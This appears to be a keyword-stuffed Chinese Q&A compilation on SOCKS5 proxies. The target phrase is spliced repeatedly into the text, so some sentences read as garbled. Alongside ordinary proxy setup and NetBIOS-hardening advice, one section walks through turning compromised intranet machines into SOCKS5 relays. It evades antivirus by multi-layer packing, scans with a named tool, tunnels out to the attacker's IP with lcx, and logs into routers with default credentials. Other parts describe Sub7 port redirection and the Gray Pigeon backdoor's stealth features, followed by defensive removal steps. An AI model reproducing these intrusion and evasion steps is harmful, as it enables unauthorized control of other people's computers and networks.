socks5黑客,socks5 windows

导航：

• 1、如何用sock5做代理，使我的IP变到别的地方去
• 2、什么是跳板软件啊
• 3、内网肉鸡作成Socks5服务器?
• 4、socks5代理的问题
• 5、什么是代理服务器？它是干什么用的？？
• 6、灰鸽子是什么

如何用sock5做代理，使我的IP变到别的地方去

首先说说隐藏真实IPsocks5黑客的方法socks5黑客，最简单socks5黑客的方法就是使用代理服务器。与直接连接到Internet相比，使用代理服务器能保护上网用户的IP地址，从而保障上网安全。代理服务器的原理是在客户机和远程服务器之间架设一个“中转站”，当客户机向远程服务器提出服务要求后，代理服务器首先截取用户的请求，然后代理服务器将服务请求转交远程服务器，从而实现客户机和远程服务器之间的联系。很显然，使用代理服务器后远端服务器包括其它用户只能探测到代理服务器的IP地址而不是用户的IP地址，这就实现socks5黑客了隐藏用户IP地址的目的，保障了用户上网安全。而且，这样还有一个好处，那就是如果有许多用户共用一个代理器时，当有人访问过某一站点后，所访问的内容便会保存在代理服务器的硬盘上，如果再有人访问该站点，这些内容便会直接从代理服务器中获取，而不必再次连接远端服务器，因此可以节约带宽，提高访问速度。

建议您最好用免费代理服务器，寻找免费代理服务器的方法有很多，你可以试试用ProxyHunter（代理猎手），它能自动为您搜索出多个免费代理服务器，并验证各个服务器的连接速度，从而让你选择最佳途径。更重要的是，代理服务器不仅支持浏览软件，而且支持电子邮件、FTP、下载、离线浏览等功能软件，可谓无所不在。【点击下载代理猎手 3.1】。不过这种方法比较费时、费事，建议不到万不得以时还是不用为好。最好的方法是使用现成的免费代理服务器，现在网上有不少网站定期提供最新的免费代理服务器，如这里提供的代理服务器的更新速度就非常快，而且各种类型的代理都有： 。建议大家把这个网页放入你的收藏夹，这样你就再也不用为找不到好的免费代理服务器而发愁了。

找到免费代理服务器后，就可以使用它了。以IE浏览器为例，运行IE，点击“工具”→“Interner选项”，在弹出的“Interner选项”对话框中选择“连接”标签，再点击“设置”按钮，在弹出的对话框中把“对此连接使用代理服务器”前面的框勾选上，然后在“地址”和“端口”栏中填入你找到的代理服务器IP和所用端口即可。

同时在“高级”设置中你还可以对不同的服务器，例如HTTP、FTP设定不同的代理服务器地址和端口。这样一来，当你再访问那些网页时，页面上显示的就不再是你的真实IP了。

不过，并不是所有的代理都不将你的真正的IP向目标地址上发送，假如你使用A4proxy之类的程序检测一些代理，发现http-ip-forward是存在的话，那证明该代理会把你的真正IP向目标地址发去，如果在一些聊天室中使用，会被高级别的人看到真正的IP。

另外，在代理中有HTTP和SOCKS代理之分，在SOCKS代理中又有SOCKS4和SOCKS5代理之分，SOCKS4和SOCKS5不同之处在于SOCKS5支持UDP这种协议，但SOCKS4是不支持的，所以在QQ上不可以使用SOCKS4代理，因为QQ使用的是UDP协议，但在ICQ上就可以使用SOCKS4或SOCKS5代理。

隐藏IP的另外一个方法是利用受控于你的电脑上的木马（也就是利用肉鸡），该电脑可以自由访问网络且不限于和你在一起（比方说单位或学校的电脑）。一些国外的木马如Sub7，具有“端口转向”功能，假设你想看xxx.com 这个网站的内容，而这个网站会记录访问者的IP，那么你可以这样做：假设受控电脑上有木马Sub7服务端程序在运行，请在自己的电脑上运行Sub7客户端，连接上那台电脑，使用端口转向的功能，在那台电脑上打开一个90端口，设定凡是从这个端口进去的数据都会转向到xxx.com 这个网站的80端口去（80端口是默认的www服务端口）。假设那个感染了Sub7的电脑的IP是202.202.202.202，那么只要在浏览器上输入 ，就可以看到 xxx.com 这个网站的内容的了，而且那个网站记录下的访问的IP是202.202.202.202，不是我们真正的IP，这样就安全多了。

好了，现在你已经可以小小地“隐身”一把了，但还不够彻底，要想“隐形”还必须隐藏隐藏计算机名和工作组。因为网上有许多黑客软件可以查出你的计算机名和工作组，他们主要是通过搜索网上是否存在使用NetBIOS协议的用户，来探测其机器名称、IP地址等等信息，并借此来攻击你。

在Internet上，NetBIOS开放就和一个后门程序差不多。因为在你安装TCP/IP协议时，NetBIOS也被Windows作为默认设置载入了你的电脑，而电脑随即也具有了NetBIOS本身的开放性。换句话讲，在不知不觉间，你的上网电脑已被打开了一个危险的“后门”。这个后门可以泄漏你的信息：你的计算机名和工作组。事实上，有许多人会用自己的真实姓名做计算机名称，还有自己的单位名字作为工作组，这样很容易根据某个人的固定信息找到某个人的IP地址。而网上针对IP地址的攻击手段和工具实在是太多了，您说这是不是很危险呢？因此，如果你是一个单机用户那么完全可以禁止NetBIOS服务，从而睹上这个危险的“漏洞”。下面是解决办法：

1.Win9x用户

在Win9x下如果你是个拨号上网用户，就完全不需要登录到NT局域网络环境，只需要在“控制面板”→“网络”，删除“Microsoft网络用户”，使用“Microsoft友好登录”，另外也不要去设置“文件打印共享”就可以了。

2.WinNT用户

在WinNT下你可以取消NetBIOS与TCP/IP协议的绑定，方法是：“控制面板”→“网络”→“NetBIOS接口”→“WINS客户(TCP/IP)”，选择“禁用”，确定后重启。

3.Win2000或者WinXP用户

先用鼠标右键单击“网络邻居”，选择“属性”，进入“网络和拨号连接”，再用鼠标右键单击“本地连接”，选择“属性”，进入“本地连接属性”。双击“Internet 协议(TCP/IP)”后，点击“高级”，选择“选项”条中的“TCP/IP 筛选”，在“只允许”中填入除了139之外要用到的端口。注：如果你在局域网中，这样会影响局域网的使用。

下面再介绍一个对Win9x/NT/2000/XP用户都有效地办法：自己定制防火墙规则。以天网个人防火墙为例，选择一条空规则，规定如下规则：“数据包方向”选“接收”，“对方IP地址”选“任何”，“协议”选“TCP”，“本地端口”选“139到139”，“对方端口”选“0到0”，在“标志位”中选上“SYN标志”，“动作”选“拦截”，然后保存即可.

最后，我们再说说如何在QQ中隐形。之所以单独谈QQ，是由于QQ已经成为绝大多数网民上网的必备工具了。

QQ采用的是UDP数据包通讯，攻击者只要向你发送一个信息，他就可以通过监视UDP数据包来获得你的IP和QQ的端口号。从理论上说，在直接通讯的模式下，想避免攻击者发现你的IP地址是十分困难的。所以这里笔者介绍一种很常见的方法来避开对方知道你的QQ地址——使用代理服务器。通过代理服务器上QQ，就可以隐藏自己的真实IP，而攻击者所看到的IP只是代理服务的地址。隐身登录QQ后发送的消息是通过腾讯的服务器中转的，这样攻击者获取的IP也只是腾讯服务器的地址。

以最新的QQ2004为例，只要右键单击屏幕右下角的QQ图标，在弹出菜单中选择“系统参数”，单击“系统设置”中的“代理设置”，选中“使用自定义的网络设置”。在“类型”中选择“SOCK5代理服务器”在“服务器”和“端口”一栏中输入你寻找到的免费代理地址 “用户名”和“密码”一般不用填，点击“测试”按钮，如果你填入的代理地址有效，则会弹出“代理服务器工作正常”提示框，否则就会弹出“无法连接到代理服务器”的提示。上述步骤做完之后，最后点击“确定”即可。提供免费代理服务器的网站有很多，也可以自己用代理猎手等工具来查找。

如果没有找到合适的Sock5代理，还可以使用支持HTTP协议的QQ服务，实现QQ连通。有了这个功能，非会员也能够通过HTTP代理上线了。要想使用TCP方式登陆，只要在图四所示图中在“类型”中选择“HTTP代理服务器”。

然后输入服务器地址和端口（一般填80），这样，非会员也可通过HTTP代理上线了。之后你就可以通过HTTP代理使用QQ了，而网友们看到的则是你的假IP，这样就安全多了socks5黑客！

好了，现在就可以体验隐身冲浪带领的快感了，而且还安全了许多！真是一举两得。

什么是跳板软件啊

一般是黑客或红客用的，一般的用户很少机会用得上.跳板这个概念用在代理服务上面偶是在接触snake的那个代理程序见到的。“代理跳板”一般都是指snake开发的那个sock5代理服务程序。代理跳板好像就是支持connect命令的http代理服务器因为常常被当成黑软使用

HTTP代理小常识

一、HTTP代理的匿名性

This is a proxy that hides the original users' IP address and other deta

ils from the remote server. 这种代理，对远端服务器隐藏原始用户的IP地址以及其

它细节（可能，但不必需）。

HTTP代理匿名性是指不通过非常技术手段，直接使用时代理的匿名安全性。（说明

：这里的匿名与其它如FTP服务器的匿名意义是不一样的，不论匿名与否，代理服务器均

能起到“代理”的作用。只是匿名代理可以确保被访问方不能追溯到源IP，在一定程度

上更加安全而已。这并不是一个重要的指标，是否必要则仁者见仁、智者见智。）

测试自己的http代理是否匿名，简单方法：xxx网站

，先看“REMOTE_ADDR”显示的ip，如果不是你本身的ip，说明代理服务器起作用了。再

看“HTTP_X_FORWARDED_FOR”，如果有，并显示你的ip，为非匿名代理。如果没有显示

，则为匿名代理。（Tips:看一下“HTTP_USER_AGENT”和“HTTP_ACCEPT_LANGUAGE”，

你就能知道你的代理提供了多大的安全性。）

二、HTTP CONNECT代理

对于HTTP代理，不少人有认识上的误区，有必要说明一下，不是所有的HTTP代理都

只能代理HTTP的，vice versa！

HTTP CONNECT代理服务器是一种能够允许用户建立TCP连接到任何端口的代理服务器

，这意味着这种代理不仅可用于HTTP，还包括FTP、IRC、RM流服务等，甚至扫描、攻击

。

三、三种代理的区别

· 全匿名代理　不改变你的request fields，使服务器端看来就像有个真正的客户

浏览器在访问它。当然，你的真实IP是隐藏起来的。服务器的网管不会认为你使用了代

理。

· 普通匿名代理　能隐藏你的真实IP，但会更改你的request fields，有可能会被

认为使用了代理，但仅仅是可能，一般说来是没问题的。不过不要受它的名字的误导，

其安全性可能比全匿名代理更高，有的代理会剥离你的部分信息（就好比防火墙的stea

lth mode），使服务器端探测不到你的*作系统版本和浏览器版本。

· 透明代理（简单代理）　改编你的request fields，并会传送真实IP。

跳板是一个程序，也可以说是一种socks5代理的应用吧。

* 从本地机器连接到远程机器， 中间通过安装的代理跳板。对应用程序而言，相当于普

通的sock代理调用。

* 在跳板之间传输的数据，是已经被动态加密的。加密种子每次不同。

* 跳板的数目由 1 到 255，不限制,当数目为0时，相当于Sock5代理服务器

内网肉鸡作成Socks5服务器?

话说在挂马得到大量肉鸡以后，众黑友可能都在想如何利用手中的这些战利品。有人喜欢偷窥人家的隐私，有的人可能就会用木马的键盘记录盗取人家的QQ密码，还有的人可能要盗取人家的宽带上网帐号充Q币。可大家有没有想到过将内网中的这些肉鸡作成SOCKS5服务器呢?这样的话，我们以后入侵就可以用这些肉鸡作跳板，黑人家也会安全的多了。有人说内网中作SOCKS5服务器不可能，即使作成了也无法利用.首先介绍一下使用的工具，lcx.exe 这是一个反向连接的内网端口映射工具，VIDC20.exe也是一个端口映射工具，不过它也有代理服务器的功能，支持http/socks4/socks5代理，支持代理验证，支持udp代理，支持二级代理;还有S扫描器，这个只有一个可执行文件，小巧方便，扫端口最合适了。这些工具在网上都有下载，在作代理服务之前，我们需要先作一下免杀，因为大部分杀毒软件是杀lcx.exe和S扫描器的，如果不作免杀，那一上传就可能被杀毒软件给杀掉像这种强悍的卡巴，在命令行下是没有办法中止的，所以只能作免杀了，其他的杀毒软件在命令行下可以中止，不过需要一些技巧，因为它们都有线程保护，用常规的方法是中止不了的。我曾经在命令行下干掉过瑞星，只是方法比较繁琐，所以就不在这里演示了。至于免杀方法嘛，只要简单的加下壳就可以过关了，据我实验，先加个北斗3.5，再加aspack 2.12，之后再加北斗3.5，这样处理后绝大部分杀软件就不杀这两个程序了，呵呵。简单吧，杀毒软件也是会区别对待的，如果是一些流行木马，加这三重壳是不能免杀的，对于一些不太重要的黑客工具，杀毒软件就会显得相对宽松的多了。我们就是钻的杀毒软件的这个空子，如果是加了三重壳也过不了杀毒软件，那就不要怕麻烦将它们的特征码给修改掉，就可以过杀毒软件了，修改的方法网上有许多动画，大家可以自己找找，我的PCSHARE马就是这样作的，过卡巴，瑞星、江民、瑞星、金山、诺顿、趋势等杀毒软件很轻松，也可以轻松过各种查马工具，这就是我修改特征码后加了三重壳作成的，一个超强的工具。呵呵。有些跑题了，言归正传。工具准备完备后，下面开始作代理了。首先打开你的木马客户端程序，将上面的这些工具上传到内网中的肉鸡上，就放在WINDOWS目录里吧，文件名嘛，最好改一下，免得引起对方注意。打开对方的命令符，键入命令：ipconfig /all查看一下肉鸡的IP地址，如：192.168.0.2，得到这个本机及网关的IP地址以后，我们就可以用S扫描器对同它同一网段的IP地址进行扫描，看这台肉鸡的网关是什么类型的。S扫描器相信大家都会用了吧。命令行：s-jk tcp 192.168.0.1 192.168.0.255 80,23,3389,1433,139,445 20这个s-jk是我加三重壳免杀后的S扫描器，这条命令在整个网段中扫描开放139 3389 1433 80 23端口的主机，呵呵，这是为渗透内部网络作准备，也许有很重要的信息出现呢。经过扫描发现这台肉鸡的网关开放80号端口，这说明这台网关一定是台路由器。那怎样登录进它的路由器呢?大家都知道宽带路由器在外网中是不能登录的，只能由它的内部网络登录，难道要进肉鸡的屏幕控制，用肉鸡的IE登录?非也，这样很容易暴露，再说肉鸡上的管理员也许现在正在电脑前工作，你是根本没有办法进行控制的，下面在自己的电脑上打开命令提示符，命令：lcx -listen 21 8000 再回到肉鸡的CMD下，命令：lcx -slave 218.57.179.152 21 192.168.0.1 80 解释一下：218.57.179.152是我的外网IP，这样就将肉鸡的宽带路由器的下一步就要打开IE，地址栏中键入： 回车后，盼望已久的并且很熟悉的登录界面出现了。这正是宽带路由器的登录界面，只不过这不是我的宽带路由器，而是另一个局域网的宽带路由器，我熟练的键入的默认用户名及密码，admin admin，确定后成功登录了。80端口映射到了我的电脑的21端上了，我连接本机的8000端口就可以了。接下来的工作简直就是轻车熟路了，设置一个虚拟服务器指向这台肉鸡，端口设置成了个陌生的端口，不要设置成8080，因为宽带路由器要使用这个端口，它是不允许设置成这个端口的，我设置的是2233，保存后，我们再回到肉鸡的命令行下，命令：vidc20 -d -p 2233 这个命令的意思就是以控制台的方式启动vidc20.exe这个程序，开2233服务端口提供代理服务。这台肉鸡已经开始提供SOCK5服务了，并且路由器上的映射也已经正常工作，我们要作的就是打开SOCK5客户端程序，设置一下SOCKS5服务器的IP地址及端口，也就是这台肉鸡的外网IP。我们将IE的图标拖到SocksCap32的图标上创建了一个新快捷方式，这样以后我们登录到ASP马时就可以双击SocksCap32中的IE进行登录了。如果你觉得不放心，可以登录ip.knowsky.com，查看一下IP，IP地址显示的是你的肉鸡的IP，使用这种代理比使用匿名的HTTP代理还要安全的多，因为给你提供代理的是台个人电脑，并且IP不固定，在一个局域网内部，没有一些监控软件记录任何的连接，并且这台个人电脑重启后vidc20.exe并不在运行，可以说是毫无痕迹，这样即使有人追查你的话，也只能查到你肉鸡的IP为止，再想继续追查就不太容易了。有人说如果管理员把宽带路由器的密码改掉了，那不是没得玩了，我随机挑选了五个局域网进行测试，全部是默认口令，看来设置默认口令的概率还是满高的。我分析了一下原因：一、可能是宽带路由器只能由内网连接，管理员对其安全性认识不足。二、内网中的电脑用户都是菜鸟，不需要作安全设置。三、管理员懈怠，没把它当回事。说实话我的宽带路由器也是设置的默认口令，为什么没有改掉呢?我觉得我应该属于第二种情况吧，内网中全部是菜鸟用户，所以根本必要修改掉，这样就暴露了一个安全问题，一旦内网中的电脑中了木马，入侵者就有可能获得你的宽带帐号，用你的宽带帐号刷Q币、刷业务;还可能登录你的ISP将你的宽带帐号给修改掉，让你上不了网了。如果入侵者拿你作跳板，他作了坏事由你背黑锅，那岂不是更加冤枉。所以，大家一定对内网的安全问题提高警惕。该打的补丁打上，该修改的默认口令给修改掉，这样就可以抵御大多数初级的入侵者的攻击了。但要想绝对安全，那是不可能的，这个世界上没有绝对的安全。

socks5代理的问题

找软件把socks5黑客他socks5黑客的1080端口打开之后你就能访问socks5黑客了。。

设置的时候把他的IP填上。。

选择S5代理 先测试下。。

开1080的端口的软件很多。。

你找下。 不过记得叫他开S5的时候最好加上密码开。

否则很容易别黑客利用。。

什么是代理服务器？它是干什么用的？？

代理服务器英文全称是Proxy Server，其功能就是代理网络用户去取得网络信息。形象的说：它是网络信息的中转站。在一般情况下，我们使用网络浏览器直接去连接其他Internet站点取得网络信息时，须送出Request信号来得到回答，然后对方再把信息以bit方式传送回来。代理服务器是介于浏览器和Web服务器之间的一台服务器，有了它之后，浏览器不是直接到Web服务器去取回网页而是向代理服务器发出请求，Request信号会先送到代理服务器，由代理服务器来取回浏览器所需要的信息并传送给你的浏览器。而且，大部分代理服务器都具有缓冲的功能，就好象一个大的Cache，它有很大的存储空间，它不断将新取得数据储存到它本机的存储器上，如果浏览器所请求的数据在它本机的存储器上已经存在而且是最新的，那么它就不重新从Web服务器取数据，而直接将存储器上的数据传送给用户的浏览器，这样就能显著提高浏览速度和效率。更重要的是：Proxy Server(代理服务器)是Internet链路级网关所提供的一种重要的安全功能，它的工作主要在开放系统互联(OSI)模型的对话层。主要的功能有：

1.突破自身IP访问限制，访问国外站点。教育网、169网等网络用户可以通过代理访问国外网站。

2.访问一些单位或团体内部资源，如某大学FTP(前提是该代理地址在该资源 的允许访问范围之内)，使用教育网内地址段免费代理服务器，就可以用于对教育 网开放的各类FTP下载上传，以及各类资料查询共享等服务。

3.突破中国电信的IP封锁：中国电信用户有很多网站是被限制访问的，这种 限制是人为的，不同Serve对地址的封锁是不同的。所以不能访问时可以换一个国 外的代理服务器试试。

4.提高访问速度：通常代理服务器都设置一个较大的硬盘缓冲区，当有外界 的信息通过时，同时也将其保存到缓冲区中，当其他用户再访问相同的信息时， 则直接由缓冲区中取出信息，传给用户，以提高访问速度。

5.隐藏真实IP：上网者也可以通过这种方法隐藏自己的IP，免受攻击。

1.IE5.0以上版本中设置代理：菜单栏“工具”-下拉菜单“Internet选项”-选项卡“连接”-在“局域网设置”中选中您目前 使用的连接，然后点击右侧的“设置”-在中间的“代理服务器”栏选中“使用代理服务器”-在“地址” 和“端口”栏输入本站提供的HTTP代理服务器-确定-确定。

2.MyIE2中设置代理服务器：菜单栏“选项”——》“代理服务器”——》“代理设置”——》在输入框中输入标准格式的代理服务器，如XXX.XXX.XXX.XXX:端口，然后“确定”并退出，继续，菜单栏“选项”——》“代理服务器”——》然后选择刚才输入的代理服务器

3.腾讯浏览器（TT浏览器）中设置代理服务器：菜单栏“工具”——》“WWW代理”——》“设置代理”——》在代理设置对话框中，点击“新增”——》在代理设置区中，输入代理，然后“确定”并退出，继续，菜单栏“工具”——》“WWW代理”——》然后选择刚才输入的代理服务器

灰鸽子是什么

灰鸽子是国内一款著名后门。比起前辈冰河、黑洞来，灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时，灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事，灰鸽子就成了很强大的黑客工具。这就好比火药，用在不同的场合，给人类带来不同的影响。对灰鸽子完整的介绍也许只有灰鸽子作者本人能够说清楚，在此我们只能进行简要介绍。

灰鸽子客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型（如等待连接还是主动连接）、主动连接时使用的公网IP（域名）、连接密码、使用的端口、启动项名称、服务名称，进程隐藏方式，使用的壳，代理，图标等等。

连接密码的设定使得灰鸽子服务端程序只能被配置它的黑客控制，避免了黑客之间的竞争。

服务端对客户端连接方式有多种，使得处于各种网络环境的用户都可能中毒，包括局域网用户（通过代理上网）、公网用户和ADSL拨号用户等。

只用一个端口来传输所有通讯数据！普通同类软件都用到了两个或两个以上的端口来完成。

支持可以控制Internet连接共享、HTTP透明代理上网的电脑！软件智能读取系统设定的代理服务器信息，无需用户设置！

可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能！无需第三方软件支持！支持Windows9x/ME/2000/Xp/2003。便于黑客进行跳板攻击。

除了具有语音监听、语音发送，还有远程视频监控功能，只有远程计算机有摄像头，且正常打开没有被占用，那么你可以看到,远程摄像头捕获的图片！还可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。

其他后门具有的功能，你几乎都可以在灰鸽子里找到。而且每个功能都做的非常细致，非常人性化。整体界面比较清爽，容易上手，对每一个小细节的考虑都很到位，所有能想到的Ideal几乎都实现了。不过黑客的方便，对于广大用户来说可不是好事。

下面介绍服务端：

配置出来的服务端文件文件名为G_Server.exe（这是默认的，当然也可以改变）。然后黑客利用一切办法诱骗用户运行G_Server.exe程序。具体采用什么办法，读者可以充分发挥想象力，这里就不赘述。

G_Server.exe第一次运行时自己拷贝到Windows目录下（98/XP操作系统为系统盘windows目录，2K/NT为系统盘winnt目录），并将它注册为服务（服务名称在上面已经配置好了），然后从体内释放2个文件到Windows目录下：G_Server.dll，G_Server_Hook.dll（近期灰鸽子版本会释放3个文件，多了一个G_ServerKey.exe，主要用来记录键盘操作）。然后将G_Server.dll，G_Server_Hook.dll注入到Explorer.exe、IExplorer.exe或者所有进程中执行。然后G_Server.exe退出，两个动态库继续运行。由于病毒运行的时候没有独立进程，病毒隐藏性很好。以后每次开机时，Windows目录下的G_Server.exe都会自动运行，激活动态库后退出，以免引起用户怀疑。

G_Server.dll实现后门功能，与控制端进行通信。灰鸽子的强大功能主要体现在这里。黑客可以对中毒机器进行的操作包括：文件管理、获取系统信息、剪贴板查看、进程管理、窗口管理、键盘记录、服务管理、共享管理，提供MS-Dos shell，提供代理服务,注册表编辑，启动telnet服务，捕获屏幕，视频监控，音频监控，发送音频，卸载灰鸽子…… 可以说，用户在本地能看到的信息，使用灰鸽子远程监控也能看到。尤其是屏幕监控和视频、音频监控比较危险。如果用户在电脑上进行网上银行交易，则远程屏幕监控容易暴露用户的帐号，在加上键盘监控，用户的密码也岌岌可危。而视频和音频监控则容易暴露用户自身的秘密，如“相貌”，“声音”。

G_Server_Hook.dll负责隐藏灰鸽子。通过截获进程的API调用隐藏灰鸽子的文件、服务的注册表项，甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以，有些时候用户感觉种了毒，但仔细检查却又发现不了什么异常。

灰鸽子的作者对于如何逃过杀毒软件的查杀花了很大力气。由于一些API函数被截获，正常模式下难以遍历到灰鸽子的文件和模块，造成查杀上的困难。要卸载灰鸽子动态库而且保证系统进程不崩溃也很麻烦，因此造成了近期灰鸽子在互联网上泛滥的局面。

灰鸽子的运行原理

灰鸽子木马分两部分：客户端和服务端。攻击者操纵着客户端，利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe。G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

Windows目录下的G_Server.exe文件将自己注册成服务（9X系统写注册表启动项），每次开机都能自动运行，运行后启动G_Server.dll和G_Server_Hook.dll并自动退出。G_Server.dll文件实现后门功能，与控制端客户端进行通信；G_Server_Hook.dll则通过拦截API调用来隐藏病毒。因此，中毒后，我们看不到病毒文件，也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同，G_Server_Hook.dll有时候附在Explorer.exe的进程空间中，有时候则是附在所有进程中。

灰鸽子的手工检测

由于灰鸽子拦截了API调用，在正常模式下木马程序文件和它注册的服务项均被隐藏，也就是说你即使设置了"显示所有隐藏文件"也看不到它们。此外，灰鸽子服务端的文件名也是可以自定义的，这都给手工检测带来了一定的困难。

但是，通过仔细观察我们发现，对于灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出，无论自定义的服务器端文件名是什么，一般都会在操作系统的安装目录下生成一个以"_hook.dll"结尾的文件。通过这一点，我们可以较为准确手工检测出灰鸽子木马。

由于正常模式下灰鸽子会隐藏自身，因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择"Safe Mode"或"安全模式"。

1、由于灰鸽子的文件本身具有隐藏属性，因此要设置Windows显示所有文件。打开"我的电脑"，选择菜单"工具"—》"文件夹选项"，点击"查看"，取消"隐藏受保护的操作系统文件"前的对勾，并在"隐藏文件和文件夹"项中选择"显示所有文件和文件夹"，然后点击"确定"。

2、打开Windows的"搜索文件"，文件名称输入"_hook.dll"，搜索位置选择Windows的安装目录（默认98/xp为C:\windows，2k/NT为C:\Winnt）。

3、经过搜索，我们在Windows目录（不包含子目录）下发现了一个名为Game_Hook.dll的文件。

4、根据灰鸽子原理分析我们知道，如果Game_Hook.DLL是灰鸽子的文件，则在操作系统安装目录下还会有Game.exe和Game.dll文件。打开Windows目录，果然有这两个文件，同时还有一个用于记录键盘操作的GameKey.dll文件。

经过这几步操作我们基本就可以确定这些文件是灰鸽子木马了，下面就可以进行手动清除。

灰鸽子的手工清除

经过上面的分析，清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作，主要有两步：1、清除灰鸽子的服务；2删除灰鸽子程序文件。

注意：为防止误操作，清除前一定要做好备份。

一、清除灰鸽子的服务

2000／XP系统：

1、打开注册表编辑器（点击"开始"－》"运行"，输入"Regedit.exe"，确定。），打开 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services注册表项。

2、点击菜单"编辑"－"查找"，"查找目标"输入"G_Server.exe"，点击确定，我们就可以找到灰鸽子的服务项。

3、删除整个G_Server项。

98／me系统：

在9X下，灰鸽子启动项只有一个，因此清除更为简单。运行注册表编辑器，打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run项，我们立即看到名为G_Server.exe的一项，将G_Server.exe项删除即可。

二、删除灰鸽子程序文件

删除灰鸽子程序文件非常简单，只需要在安全模式下删除Windows目录下的G_Server.exe、G_Server.dll、G_Server_Hook.dll以及G_Serverkey.dll文件，然后重新启动计算机。至此，灰鸽子已经被清除干净。